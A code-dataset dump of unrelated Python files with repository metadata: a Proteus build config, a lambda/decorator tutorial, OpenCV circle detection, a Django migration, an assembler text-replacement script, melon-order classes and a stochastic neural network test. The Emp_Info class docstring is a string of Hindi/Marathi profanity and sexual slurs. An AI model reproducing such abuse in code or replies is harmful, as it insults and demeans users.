if platform_lapack_h:
    PROTEUS_LAPACK_H = platform_lapack_h
else:
    PROTEUS_LAPACK_H = r'"clapack.h"'
PROTEUS_LAPACK_LIB_DIR = '.'
PROTEUS_LAPACK_LIB = 'lapack'
if platform_lapack_integer:
    PROTEUS_LAPACK_INTEGER = platform_lapack_integer
else:
    PROTEUS_LAPACK_INTEGER = 'int'
# Triangle settings (overridable via TRIANGLE_DIR).
PROTEUS_TRIANGLE_INCLUDE_DIR, PROTEUS_TRIANGLE_LIB_DIR = get_flags('triangle')
PROTEUS_TRIANGLE_H = r'"triangle.h"'
PROTEUS_TRIANGLE_LIB ='tri'
# DAETK settings (overridable via DAETK_DIR).
PROTEUS_DAETK_INCLUDE_DIR, PROTEUS_DAETK_LIB_DIR = get_flags('daetk')
PROTEUS_DAETK_LIB ='daetk'
PROTEUS_DAETK_LIB_DIRS = [PROTEUS_DAETK_LIB_DIR]
# MPI: only directories are recorded; no MPI libraries are linked explicitly.
PROTEUS_MPI_INCLUDE_DIR, PROTEUS_MPI_LIB_DIR = get_flags('mpi')
PROTEUS_MPI_INCLUDE_DIRS = [PROTEUS_MPI_INCLUDE_DIR]
PROTEUS_MPI_LIB_DIRS = [PROTEUS_MPI_LIB_DIR]
PROTEUS_MPI_LIBS =[]
# PETSc: likewise, directories only.
PROTEUS_PETSC_INCLUDE_DIR, PROTEUS_PETSC_LIB_DIR = get_flags('petsc')
PROTEUS_PETSC_LIB_DIRS = [PROTEUS_PETSC_LIB_DIR]
PROTEUS_PETSC_LIBS = []
PROTEUS_PETSC_INCLUDE_DIRS = [PROTEUS_PETSC_INCLUDE_DIR]
| [
"aron@ahmadia.net"
] | aron@ahmadia.net |
8523b61b15c1d7c42690069d07d5e2e61b04e428 | 2023fa470a2df0c5feda1f57c87752c80366de83 | /03_函数式编程/06_匿名函数.py | 66c5876953c192dee138821dd476ac3a34e3fdeb | [] | no_license | lmmProject/python_01 | 73d53b2b65cc56db936de765b5b9472dc856f59a | f51d24fb054e970c847e448b6ff176b851e1f9fc | refs/heads/master | 2020-03-18T06:18:51.455204 | 2018-11-10T10:05:43 | 2018-11-10T10:05:43 | 134,387,892 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,538 | py | # 匿名函数
# When passing a function as an argument it is often unnecessary to define it
# explicitly -- passing an anonymous (lambda) function is more convenient.
print(list(map(lambda x: x*x, [1, 2, 3, 4, 5])))
# A lambda is limited to a single expression and has no 'return' statement;
# the value of that expression is the return value.
f = lambda x : x*x
print(f)
print(f(5))
# Decorators
# Suppose we want to extend the now() function -- e.g. automatically print a
# log line around each call -- without modifying now()'s definition.
# Adding functionality dynamically at run time like this is called a
# "decorator" (Decorator).  Essentially, a decorator is a higher-order
# function that returns a function.  A log-printing decorator can be
# defined as follows:
def log(func):
    """Decorator: print a short trace line before each call to *func*."""
    def wrapper(*args, **kwargs):
        # Announce the call, then delegate to the wrapped function untouched.
        print('call %s():' % func.__name__)
        return func(*args, **kwargs)
    return wrapper
# Because log is a decorator, it accepts a function and returns a function.
# Python's @ syntax applies the decorator right at the function definition:
@log
def now():
    print('2015-3-25')
now()
# wrapper() is declared as wrapper(*args, **kw), so it accepts calls with any
# arguments; inside, it first prints the log line and then calls the original
# function.  Both decorator definitions above work, but one step is missing:
# functions are objects with attributes such as __name__, and after
# decoration the function's __name__ has changed from 'now' to 'wrapper':
# >>> now.__name__
# 'wrapper'
# That is because the returned wrapper() function is literally named
# 'wrapper'.  Code that depends on the function's signature can break, so the
# original function's __name__ (and other attributes) must be copied onto
# wrapper().  There is no need to write wrapper.__name__ = func.__name__ by
# hand -- the built-in functools.wraps does exactly that, so a complete
# decorator looks like this (here, a decorator that takes its own argument):
import functools
def log_fts(text):
    """Parameterised logging decorator: prefix each call trace with *text*."""
    def decorator(func):
        @functools.wraps(func)  # keep the wrapped function's __name__ etc.
        def wrapper(*args, **kwargs):
            print('%s %s():' % (text, func.__name__))
            return func(*args, **kwargs)
        return wrapper
    return decorator
def now2():
    print('2015-3-25')
# Apply the parameterised decorator manually (equivalent to @log_fts(...)).
now2 = log_fts('自定义log文本')(now2)
now2()
# Partial functions
# As seen with function parameters, default values make functions easier to
# call; functools.partial achieves the same effect.  For example, int()
# converts a string to an integer, defaulting to base 10:
print(int('12345'))
print(int('1000000', base=2))
def int2(x, base=2):
    return int(x, base)
print(int2('1000000'))
# functools.partial builds such a partial function for us -- there is no need
# to define int2() by hand:
import functools
int_two = functools.partial(int, base=2)
print(int_two('1000000'))
# When passing:
max2 = functools.partial(max, 10)
# the 10 is automatically prepended to *args on the left, i.e.:
f1 = max2(5, 6, 7)
print(f1)
# is equivalent to:
args = (10, 5, 6, 7)
f2 = max(*args)
print(f2)
# The result is 10.
# Partial-function summary: when a function takes too many arguments,
# functools.partial can create a new function with some of the original
# arguments pre-filled, making calls simpler.
| [
"752634866@qq.com"
] | 752634866@qq.com |
d4d1963c6252b5ad2e2682a181032d5405da8128 | 8f9e85d98b89bab6b1ba84c8b11745d4b7fd2d69 | /src/circledetection/circle-detection.py | bfce65700f939d25d6e9b7140f8680e629609d2e | [] | no_license | Echaflo/python_opencv_image_manipulation | 1faaa39ca21d78aed1ada9871e825f6aca563ea6 | 7a0d792de5e5608843cb7ef19f068aab3a83c168 | refs/heads/master | 2023-08-11T22:36:42.217725 | 2019-01-20T07:00:01 | 2019-01-20T07:00:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,039 | py | import numpy as np
import imutils
import cv2
from matplotlib import pyplot as plt
#
# Load the OMR sheet as-is (OpenCV returns BGR channel order by default).
bgr_img = cv2.imread('../../resources/omr-imgs/omr-1.png') # read as it is
if bgr_img.shape[-1] == 3: # color image
    b, g, r = cv2.split(bgr_img) # get b,g,r
    rgb_img = cv2.merge([r, g, b]) # switch it to rgb (matplotlib expects RGB)
    gray_img = cv2.cvtColor(bgr_img, cv2.COLOR_BGR2GRAY).copy()
else:
    # NOTE(review): in this branch rgb_img is never assigned, so the
    # plt.imshow(rgb_img) call below would raise NameError -- confirm that
    # inputs are always 3-channel images.
    gray_img = bgr_img.copy()
# Median blur suppresses noise before the Hough circle transform.
img = cv2.medianBlur(gray_img, 15)
cimg = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
circles = cv2.HoughCircles(img, cv2.HOUGH_GRADIENT, 1, 20, param1=50, param2=30, minRadius=0, maxRadius=0)
circles = np.uint16(np.around(circles))
for i in circles[0, :]:
    # draw the outer circle
    cv2.circle(cimg, (i[0], i[1]), i[2], (0, 255, 0), 2)
    # draw the center of the circle
    cv2.circle(cimg, (i[0], i[1]), 2, (0, 0, 255), 3)
# Show the original next to the circle-annotated result, side by side.
plt.subplot(121), plt.imshow(rgb_img)
plt.title('Input Image'), plt.xticks([]), plt.yticks([])
plt.subplot(122), plt.imshow(cimg)
plt.title('Hough Transform'), plt.xticks([]), plt.yticks([])
plt.show()
| [
"asmmahmud@gmail.com"
] | asmmahmud@gmail.com |
d86d741f2fbdcb9846d35a7f23203bd2c06de2c4 | 1c21d0b6bab27159e3cbc7cf2ad7e24b79b47d65 | /bmi/migrations/0004_suggestion.py | e0cc0e2c316ddeb5542331dcd96a97356ed446b5 | [] | no_license | ctijstha/proj | 7fa5ad58cbdacc31f53ec80cdd6d86f51ab6fd76 | 10b9e36f7bf74336e6c7a938294f68bf4815347d | refs/heads/main | 2023-07-11T06:38:18.790931 | 2021-08-02T04:18:58 | 2021-08-02T04:18:58 | 391,814,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 680 | py | # Generated by Django 3.1.7 on 2021-04-25 10:16
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: create the Suggestion model for the bmi app."""
    # Must run after the previous bmi migration.
    dependencies = [
        ('bmi', '0003_auto_20210425_1532'),
    ]
    operations = [
        migrations.CreateModel(
            name='Suggestion',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('category', models.CharField(choices=[('Underweight', 'Underweight'), ('Normal', 'Normal'), ('Overweight', 'Overweight'), ('Obese', 'Obese')], max_length=25)),
                ('message', models.TextField()),
            ],
        ),
    ]
| [
"chitij165@gmail.com"
] | chitij165@gmail.com |
e00fdd7472a73b96d2f82a944a235a269d71e7d1 | 8eeef7742573a8b671648d94e448d5614272c5d6 | /Python3/Employee_Info.py | 2806742ccfad84fb0e73100ca146307f0ba832dc | [] | no_license | damodardikonda/Python-Basics | 582d18bc9d003d90b1a1930c68b9b39a85778ea7 | fd239722fc6e2a7a02dae3e5798a5f1172f40378 | refs/heads/master | 2023-01-28T16:22:19.153514 | 2020-12-11T06:36:49 | 2020-12-11T06:36:49 | 270,733,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 610 | py | class Emp_Info():
'''Ky re Zaatya , Madarchod , Lavdya , Chinnal , Randi ,..........'''
    def __init__(s , ename ,esal , comp , eid):
        # 's' plays the role of 'self'.
        s.e1 = ename        # employee name
        s.e2 = int(esal)    # salary; int() truncates any decimal part
        s.e3 = comp         # company name
        s.e4 = eid          # employee id
    def Info(x):
        # 'x' plays the role of 'self'; print a summary of the employee.
        aa = 2
        print(aa)  # NOTE(review): stray debug value -- purpose unclear
        print("My name is %s " %(x.e1))
        print(" my sal is %f " %(x.e2))
        print("Company name is {} " . format(x.e3))
        print("ID is " , x.e4)
print(Emp_Info.__doc__)
# help() prints the auto-generated documentation for the class.
help(Emp_Info)
emp1 = Emp_Info("damodar" , 900000.80 , "Own" ," 1")
emp1.Info()
emp2 = Emp_Info("dams" , 880000.80 , "Own" ," 2")
emp2.Info()
| [
""
] | |
2ba363627f58aa5a01f3a6fc9d241a1c6e47de87 | 9d8e2928b026cc4050598f6f9ef59066a8349f61 | /hacking-game/setup.py | e5384aa2feea975aa3e2e0124533607cc5ff5af3 | [] | no_license | davidlyfr/python-learning | 843c1b1ef914fb9e8b2dcdd24135416ef0dcc832 | f6de7dbb0dceb97e52c79008faaa74d8e2569dff | refs/heads/master | 2021-01-15T16:48:09.715946 | 2018-02-20T22:09:16 | 2018-02-20T22:09:16 | 99,727,988 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 503 | py | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
# BUG FIX: the original wrapped key/value pairs in square brackets, which is a
# SyntaxError in Python -- package metadata must live in a dict so it can be
# unpacked into setup(**config).
config = {
    'description': 'Hacking Game',
    'author': 'David Lynch',
    'url': 'URL to get it at.',
    'download_url': 'Where to download it.',
    'author_email': 'davelynch45@gmail.com',
    'version': '0.1',
    'install_requires': ['nose'],
    'packages': ['hackrecon'],
    'scripts': [],
    'name': 'hackgame'
}
setup(**config)
| [
"davelynch45@gmail.com"
] | davelynch45@gmail.com |
20053c07eb4c7606786ad0eb7bbae67c68b3aaf3 | f20e5f22fa3d5c7c868ea7d1850ca5f78529350d | /string_index.py | 1faeafeceb4f7c7c2a99e39cee823fac26cf6b8e | [] | no_license | KenRishabh/BtechCSE | f40e83f17042d3d49c0c491e612e1138e6974b84 | 1897120b973fc9a342143baefc64ecde126a19f9 | refs/heads/main | 2023-04-27T10:38:02.010519 | 2021-05-06T13:18:37 | 2021-05-06T13:18:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 167 | py | #string indexing
# String indexing: positive indexes count from 0 at the front,
# negative indexes count from -1 at the back.
language = "Rishabh"
# position (index number): positive , negative
# R=0 , -7
# i=1 , -6
# s=2 , -5
# h=3 , -4
# a=4 , -3
# b=5 , -2
# h=6 , -1
print(language[-1]) | [
"noreply@github.com"
] | KenRishabh.noreply@github.com |
5edbe851415c7f12fe01314ef03eec162a7e5354 | 1afa1b1929d1cd463cd9970174dd58ce2ca6eb1e | /configs/deeplabv3plus/deeplabv3plus_r101-d8_512x512_40k_voc12aug.py | 9e3cd3501becb0dd284113d675963a2c474b247b | [
"Apache-2.0"
] | permissive | CAU-HE/CMCDNet | 2328594bf4b883384c691099c72e119b65909121 | 31e660f81f3b625916a4c4d60cd606dcc8717f81 | refs/heads/main | 2023-08-08T17:21:57.199728 | 2023-07-28T07:34:40 | 2023-07-28T07:34:40 | 589,927,845 | 12 | 1 | null | null | null | null | UTF-8 | Python | false | false | 140 | py | _base_ = './deeplabv3plus_r50-d8_512x512_40k_voc12aug.py'
# Swap in the deeper ResNet-101 backbone (weights from the open-mmlab zoo).
model = {
    'pretrained': 'open-mmlab://resnet101_v1c',
    'backbone': {'depth': 101},
}
| [
"flyhxn@qq.com"
] | flyhxn@qq.com |
69a3ef5ba87477ee91fea7adbf43cc3563a04e62 | 97f1f0c3c767f5b81d33ab879e4e37809b201660 | /HelloEclipse/python/textReplacement.py | 26565552aa41a6267828fc7fda77b48538197fb0 | [] | no_license | norhanelzanaty92/hello | 7481689d22ffde6cfc7bf3d2c3145239e864e8e8 | 56378da210c14c024c765955f6e19db24e9ccdc9 | refs/heads/master | 2021-01-10T05:45:29.831470 | 2016-04-02T13:19:56 | 2016-04-02T13:19:56 | 55,295,385 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,673 | py | import sys
import re
import os.path
#adding the header to the file
def Addingtofile(Headerfile, ASMfile):
    """Prepend the contents of Headerfile to ASMfile, rewriting ASMfile in place."""
    # Context managers guarantee the handles are closed even on error
    # (the original left files open if readlines() raised).
    with open(Headerfile, 'r') as header:
        header_lines = header.readlines()
    with open(ASMfile, 'r') as asm:
        asm_lines = asm.readlines()
    with open(ASMfile, 'w') as asm:
        asm.writelines(header_lines)
        asm.writelines(asm_lines)
def includeFileintoAsm(ImportFile, ASMfile):
    """For each '.import <name>.inc' line in ImportFile, prepend that .inc
    file's contents to ASMfile (via Addingtofile)."""
    with open(ImportFile, 'r') as import_file:
        lines = import_file.readlines()
    for line in lines:
        # group(1) is the included file name, e.g. 'defs.inc'.
        match = re.search(r'.import\W+(\w+[.]inc)', line)
        if match:
            Addingtofile(match.group(1), ASMfile)
#adding the equ to file
def findAndReplaceLabel(ASMfile, Labelfile):
    """For every 'name:address' entry in Labelfile, substitute the label name
    with its address inside ASMfile (via findAndReplaceHelper)."""
    with open(Labelfile, 'r') as label_file:
        lines = label_file.readlines()
    for line in lines:
        # group(1) is the label text, group(2) the value it resolves to.
        match = re.search(r'(\w*)[:](\w*)', line)
        if match:
            findAndReplaceHelper(match, ASMfile)
#adding the adresses to the asm
def addingAddresses(Asmfile):
    """Walk an asm listing while tracking the program counter (pc).

    '.org <hex>' directives reset the pc; label lines ('name:') are written to
    'out.label' annotated with the current pc; every other sufficiently long
    line goes to 'out.asmadd' prefixed with ';<pc>;' and advances the pc by 1.
    """
    pc = 0
    with open(Asmfile, 'r') as asm_file:
        lines = asm_file.readlines()
    with open('out.label', 'w') as label_file, \
         open('out.asmadd', 'w') as asm_address:
        for line in lines:
            match_label = re.search(r'(\w+:)', line)
            match_org = re.search(r'.org\W+(\d+)', line)
            if match_org:
                # The .org operand is interpreted as a hexadecimal address.
                pc = int(match_org.group(1), 16)
            elif match_label:
                # Record the label together with its current address.
                label_file.write(line.rstrip("\n") + hex(pc) + "\n")
            elif len(line.rstrip(r"\n")) > 4:
                # NOTE(review): r"\n" strips the characters '\' and 'n', not a
                # newline -- possibly a typo for "\n"; kept as-is to preserve
                # the original line-length filter.  TODO confirm intent.
                asm_address.write(';' + hex(pc) + ';' + line)
                pc = pc + 1
#adding the adresses to the asm
def addingLineEndToTheLabel(Asmfile):
    """Rewrite Asmfile so every label ('name:') is followed by a line break,
    separating the label from any instruction on the same line."""
    with open(Asmfile, 'r') as asm_file:
        lines = asm_file.readlines()
    with open(Asmfile, 'w') as asm_file:
        for line in lines:
            if re.search(r'(\w+:)', line):
                asm_file.write(re.sub(r'(\w+:)', r'\1\n', line))
            else:
                asm_file.write(line)
#adding the equ to file
def findAndReplace(ASMfile, EQUfile):
    """For every '.equ NAME VALUE' line in EQUfile, substitute NAME with VALUE
    throughout ASMfile (via findAndReplaceHelper)."""
    with open(EQUfile, 'r') as equ_file:
        lines = equ_file.readlines()
    for line in lines:
        # group(1) is the symbol, group(2) the replacement value.
        match = re.search(r'.equ\W+(\w+)\W*(\w*)', line)
        if match:
            findAndReplaceHelper(match, ASMfile)
def findAndReplaceHelper(match, ASMfile):
    """Replace every occurrence of match.group(1) with match.group(2) in
    ASMfile, rewriting the file in place."""
    with open(ASMfile, 'r') as asm_file:
        asm_lines = asm_file.readlines()
    with open(ASMfile, 'w') as asm_file:
        for asm_line in asm_lines:
            # group(1) is used as a regex pattern; it is matched as \w+ by the
            # callers, so it contains no regex metacharacters.
            asm_file.write(re.sub(match.group(1), match.group(2), asm_line))
#dont forget to elemenate the comment
def commentElemenate(file_Name):
    """Strip '//', ';' and '#' comments from the file, rewriting it in place.

    A '.device' directive is not copied back; instead it is diverted into
    'out.microType' so later stages can read the target device separately.
    """
    with open(file_Name, 'r') as source:
        lines = source.readlines()
    with open(file_Name, 'w') as target:
        for line in lines:
            # '[//][//]' is a character-class spelling of the literal '//'.
            if re.search(r'[//][//].*', line):
                target.write(re.sub(r'[//][//].*', '', line))
            elif re.search(r'[;].*', line):
                target.write(re.sub(r'[;].*', '', line))
            elif re.search(r'[#].*', line):
                target.write(re.sub(r'[#].*', '', line))
            elif re.search(r'[.]device', line):
                with open('out.microType', 'w') as micro_type_file:
                    micro_type_file.write(line)
            else:
                target.write(line)
# find the .include
def findInclude(file_Name):
    """Copy every '.import' line from file_Name into 'out.import' (cwd)."""
    with open(file_Name, 'r') as source, open('out.import', 'w') as import_file:
        for line in source:
            if re.search(r'[.]import', line):
                import_file.write(line)
#find (.equ) and replace it in the file
def divideFile(file_Name):
    """Split the source into 'out.equ' (.equ lines), 'out.import' (.import
    lines) and 'out.asm' (everything else), all created in the cwd.

    'out.def' is created but left empty: the .def handling is disabled (it was
    commented out in the original), yet later stages may expect the file.
    """
    with open(file_Name, 'r') as source, \
         open('out.import', 'w') as import_file, \
         open('out.equ', 'w') as equ_file, \
         open('out.asm', 'w') as asm_file, \
         open('out.def', 'w') as def_file:
        for line in source:
            if re.search(r'[.]equ', line):
                equ_file.write(line)
            elif re.search(r'[.]import', line):
                import_file.write(line)
            else:
                asm_file.write(line)
# Define a main() function that prints a little greeting.
def main():
  # Entry point (note: Python 2 'print' statements throughout this file).
  # Expects the .asm source file as the first command-line argument.
  if len(sys.argv) >= 2:
    match=re.search(r'[.]asm',sys.argv[1])
    if match:
        print 'found'
        re.search('.asm',sys.argv[1])
        file_Name = sys.argv[1]
        #file_Name=re.sub('.asm','.mahmoud',file_Name)
        print file_Name
        if os.path.exists(file_Name):
            print 'the file exists'
            # Pipeline: pull in .import'ed files, split the source, strip
            # comments, expand .equ symbols, then assign addresses and
            # resolve label references.
            findInclude(file_Name)
           # Addingtofile('out.import',file_Name)
            includeFileintoAsm('out.import',file_Name)
            divideFile(file_Name)
            commentElemenate('out.import')
            #### adding the import file to the asm befor elemenating the comment ##############################
            commentElemenate('out.equ')
            commentElemenate('out.asm')
            ##.def finding and replace replace
            findAndReplace('out.asm','out.equ')
            addingLineEndToTheLabel('out.asm')
            addingAddresses('out.asm')
            findAndReplaceLabel('out.asmadd','out.label')
        else:
            print 'the file doesnt exist'
    else:
        print 'not avalid file it must be .asm'
  else:
    print 'plz enter the file.asm'
# This is the standard boilerplate that calls the main() function.
if __name__ == '__main__':
    main()
| [
"m.mamdooh@mamdooh"
] | m.mamdooh@mamdooh |
020e733c9e884550d43c2b341cebf6129d819ed9 | f01597b46110214c3823e762b0e46455d67930f7 | /multidb_router_app/data_handler.py | 2342ceb8375c703de4c8cc43cd9cb352d16d39ce | [] | no_license | yshlodha/multidb_router | 3f128399391b7a40668117d60d29f7c34d805dc3 | ce7769be4c2b0f10ccec375f72f5fd6dd5fe1e46 | refs/heads/master | 2020-03-10T00:03:13.877376 | 2018-04-11T12:24:58 | 2018-04-11T12:24:58 | 129,072,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,233 | py | from .models import *
def get_product_list(user):
    """Return [{db_name: products_queryset}, ...] for every database in which
    *user* owns at least one product; [] if the user has no DatabaseUser row."""
    try:
        dbuser = DatabaseUser.objects.get(user__username=user.username)
    except DatabaseUser.DoesNotExist:
        return []
    product_list = []
    for database in dbuser.databases.all():
        # Query each of the user's databases through the multi-db router.
        products = Product.objects.using(database.name).filter(user__id=dbuser.id)
        if products:
            product_list.append({database.name: products})
    return product_list
def get_user_dbs(user):
    """Return the list of database names assigned to *user*, or [] when the
    user has no DatabaseUser row."""
    try:
        dbuser = DatabaseUser.objects.get(user__username=user.username)
    except DatabaseUser.DoesNotExist:
        return []
    return [database.name for database in dbuser.databases.all()]
def get_dbuser(username):
    """Look up the DatabaseUser for *username*; None when no such row exists."""
    try:
        return DatabaseUser.objects.get(user__username=username)
    except DatabaseUser.DoesNotExist:
        return None
def add_product_to_db(user, name, category, database):
    """Create a Product for *user* in the given *database*.

    Returns True on success, False when the user has no DatabaseUser row.
    """
    try:
        dbuser = DatabaseUser.objects.get(user__username=user.username)
    except DatabaseUser.DoesNotExist:
        return False
    # Persist explicitly into the selected database via .save(using=...).
    Product(user_id=dbuser.id, category=category, name=name).save(using=database)
    return True
def get_all_user_products():
    """Return [{username: product_list}, ...] for every non-superuser that
    owns at least one product (delegates to get_product_list per user)."""
    users = []
    for dbuser in DatabaseUser.objects.filter(user__is_superuser=False):
        products = get_product_list(dbuser.user)
        if products:
            users.append({dbuser.user.username: products})
    return users
def delete_product(username, product_id, db):
"""
:param username:
:param product_id:
:param db:
:return:
"""
try:
dbuser = DatabaseUser.objects.get(user__username=username)
except DatabaseUser.DoesNotExist:
return False
try:
product = Product.objects.using(db).get(id=product_id, user__id=dbuser.id)
except Product.DoesNotExist:
return False
product.delete()
return True | [
"yshlodha03@gmail.com"
] | yshlodha03@gmail.com |
f925b0bbc8dff7cade5763ea534cd301ea570730 | d36471a481ff0ff71aa277d14928a48db9b6140b | /melons.py | 1ecfacead0e3930d7b11d129e6adb944e4fa10f5 | [] | no_license | Quynhd07/melons-classes | ca0e47f694cc6337136ca2431f7a856e9135b3ea | f668d5fd97dd7c3a37bd26bbfe2310324fdd388c | refs/heads/master | 2020-12-30T00:40:33.897567 | 2020-02-07T21:05:17 | 2020-02-07T21:05:17 | 238,799,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,309 | py | """Classes for melon orders."""
class AbstractMelonOrder():
    """Base class holding the attributes and behavior all melon orders share."""
    def __init__(self, species, qty):
        """Initialize melon order attributes."""
        self.species = species
        self.qty = qty
        self.shipped = False
    def get_total(self):
        """Calculate price, including tax.

        Christmas melons carry a 1.5x base-price premium; ``self.tax`` is
        supplied by the concrete subclass.
        """
        base_price = 5
        if self.species == "Christmas melons":
            base_price = base_price * 1.5
        return (1 + self.tax) * self.qty * base_price
    def mark_shipped(self):
        """Record the fact that an order has been shipped."""
        self.shipped = True
class DomesticMelonOrder(AbstractMelonOrder):
    """A melon order within the USA (8% tax)."""
    def __init__(self, species, qty):
        """Initialize melon order attributes."""
        super().__init__(species, qty)
        self.order_type = "domestic"
        self.tax = 0.08
class InternationalMelonOrder(AbstractMelonOrder):
    """An international (non-US) melon order (15% tax, small-order fee)."""
    def __init__(self, species, qty, country_code):
        """Initialize melon order attributes."""
        # BUG FIX: the base initializer only accepts (species, qty); the
        # original also passed country_code, raising TypeError on every
        # instantiation.
        super().__init__(species, qty)
        self.country_code = country_code
        self.order_type = "international"
        self.tax = .15
    def get_country_code(self):
        """Return the country code."""
        return self.country_code
    def get_total(self):
        """Add a $3 flat fee on international orders of fewer than 10 melons."""
        total = super().get_total()
        if self.qty < 10:
            flat_fee = 3
            total = total + flat_fee
        return total
class GovernmentMelonOrder(AbstractMelonOrder):
    """A government order: 100% tax and an inspection step before shipping."""
    def __init__(self, species, qty):
        """Initialize melon order attributes."""
        super().__init__(species, qty)
        self.passed_inspection = False
        self.tax = 1
    def mark_inspection(self, status):
        """Record a passed inspection; returns True when status == 'passed'
        and None otherwise.  (Parameter renamed from ``bool`` to avoid
        shadowing the builtin.)"""
        if status == 'passed':
            self.passed_inspection = True
            return self.passed_inspection
| [
"you@example.com"
] | you@example.com |
136d2a167c8d553bc5631b9273a93ef436f3759d | c8a1b6fba433fd1d685d01e8edc5e25d1263a785 | /lib/python3.7/tempfile.py | 28a0f20e40e5697aa9c8aa046f4cade2f3b75b84 | [] | no_license | eaduart/dmsWeatherStation | b99e35cc78a03ce74714b6052c274580a25defb6 | 52b6f727f808cef8fe9b368d8b421a200f3bc563 | refs/heads/main | 2023-02-07T19:17:52.695403 | 2021-01-02T08:53:17 | 2021-01-02T08:53:17 | 326,067,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 61 | py | /Users/eduarte@us.ibm.com/anaconda3/lib/python3.7/tempfile.py | [
"eduarte@us.ibm.com@Edwards-MacBook-Pro-2.local"
] | eduarte@us.ibm.com@Edwards-MacBook-Pro-2.local |
4776c9684c14116959aaa73abbf7a29bfac6a229 | bdc9a3263ad2f58aa2d3dffde2ce78d3b51c71fd | /Archive/intensive_snn_tests/intensive_snn_tests_16.py | bc02e601e708b874787ccd3d376d7a879fb9b98b | [] | no_license | yjod22/Framework_SNN | 15a7ee783fa50daadf6f28302a55809def7ec3c3 | 7beec46414745d59a5d7a59395bd6447bed4a58a | refs/heads/master | 2022-04-07T07:54:36.731178 | 2020-02-20T14:32:07 | 2020-02-20T14:32:07 | 188,841,720 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,419 | py | #
###############################################################################
# #
# Copyright (c) #
# All rights reserved. #
# #
###############################################################################
#
# Filename: intensive_snn_tests.py
#
###############################################################################
# Description:
#
# (For a detailed description look at the object description in the UML model)
#
###############################################################################
# History
################################################################################
# File: intensive_snn_tests.py
# Version: 8.0
# Author/Date: Junseok Oh / 2019-05-23
# Change: snLength: 4096
# Conv(2, 4x4), activation function(tanh(0.7x)), Conv(3, 4x4), activation function(tanh(0.7x)),
# maxPooling(2x2), Dense(100), activation function(relu), Dense(10), activation function(softmax)
# Stochastic Conv(APC+BTanh), Stochastic Conv(APC+BTanh), Stochastic Dense(APC mode+Relu), BinaryConnectedLAyer
# (SCR_V6.4-1): NN Optimization-JSO (Make use of listIndex not to consider zero weights in addition)
# (SCR_V6.4-4): Create SaveInTxtFormat function
# Cause: -
# Initiator: Junseok Oh
################################################################################
# File: intensive_snn_tests.py
# Version: 6.4
# Author/Date: Junseok Oh / 2019-03-24
# Change: snLength: 4096
# Conv(2, 4x4), activation function(tanh(0.7x)), Conv(3, 4x4), activation function(tanh(0.7x)),
# maxPooling(2x2), Dense(100), activation function(relu), Dense(10), activation function(softmax)
# Stochastic Conv(APC+BTanh), Stochastic Conv(APC+BTanh), Stochastic Dense(APC mode+Relu), BinaryConnectedLAyer
# Cause: Need short description for this file
# Initiator: Junseok Oh
################################################################################
# File: intensive_snn_tests.py
# Version: 6.1 (SCR_V6.0-5)
# Author/Date: Junseok Oh / 2019-01-31
# Change: Save the intermediate results in the txt format
# Refer to the following website
# https://stackoverflow.com/questions/3685265/how-to-write-a-multidimensional-array-to-a-text-file/3685295
# Cause: Need to extract the intermediate results
# Initiator: Florian Neugebauer
################################################################################
# File: intensive_snn_tests.py
# Version: 6.1 (SCR_V6.0-4)
# Author/Date: Junseok Oh / 2019-01-31
# Change: Delete the object when it is not needed anymore
# Cause: Need to handle the memory leakage issue during runtime
# Initiator: Florian Neugebauer
################################################################################
# File: intensive_snn_tests.py
# Version: 6.0 (SCR_V5.4-2)
# Author/Date: Junseok Oh / 2019-01-05
# Change: This software is branched from v6.0-PreV07-hybrid_cnn_passau.py
# Cause: Intensive Stochastic Neural Network tests
# Initiator: Florian Neugebauer
###############################################################################
import keras
from keras.datasets import mnist
from keras.models import Sequential, Model
from keras.layers import Dense, Dropout, Flatten, Activation
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
import WeightScaling_large
from keras.utils.generic_utils import get_custom_objects
import numpy as np
from snn.holayer import HOModel, HOMaxPoolingExact, HOMaxPoolingAprox, HOConvolution, HOConnected
from snn.utils import HOUtils
# misc functions
def createSN(x, length):
    """Create a bipolar stochastic number (bool vector) encoding value x.

    The count of True bits approximates ((x + 1) / 2) * length; a random draw
    decides whether that count is rounded up or down, and the bits are then
    shuffled into a random order.
    """
    # Single random draw kept for RNG-sequence compatibility with callers.
    large = np.random.rand(1)
    x_SN = np.full(length, False)
    if large:
        ones = int(np.ceil(((x + 1) / 2) * length))
    else:
        ones = int(np.floor(((x + 1) / 2) * length))
    # Set the leading 'ones' positions, then randomise their placement.
    x_SN[:ones] = True
    np.random.shuffle(x_SN)
    return x_SN
def stochtoint(x):
    """Convert a bipolar stochastic number back to its real value in [-1, 1]."""
    ratio = sum(x) / len(x)
    return ratio * 2.0 - 1.0
def first_layer_activation(x):
    """Scaled tanh, tanh(0.7*x), applied after conv layer 1; its output stays
    in (-1, 1), the range bipolar stochastic numbers can encode."""
    return K.tanh(x*0.7)
    # 2 = 1 input layer x 1x1 filter + 1 bias
    #return K.tanh(x/2)
    #return K.relu(x/2)
def second_layer_activation(x):
    """Scaled tanh, tanh(0.7*x), applied after conv layer 2 (same rationale
    as first_layer_activation)."""
    return K.tanh(x*0.7)
    # 2 = 1 input layers x 1x1 filter + 1 bias
    #return K.tanh(x/2)
    #return K.relu(x/2)
# Register the custom activations so Keras can resolve them by name.
get_custom_objects().update({'first_layer_activation': Activation(first_layer_activation)})
get_custom_objects().update({'second_layer_activation': Activation(second_layer_activation)})
np.set_printoptions(threshold=np.inf)
batch_size = 128
num_last_classes = 10
epochs = 2
# input image dimensions
img_rows, img_cols = 28, 28
# the data, shuffled and split between train and test sets
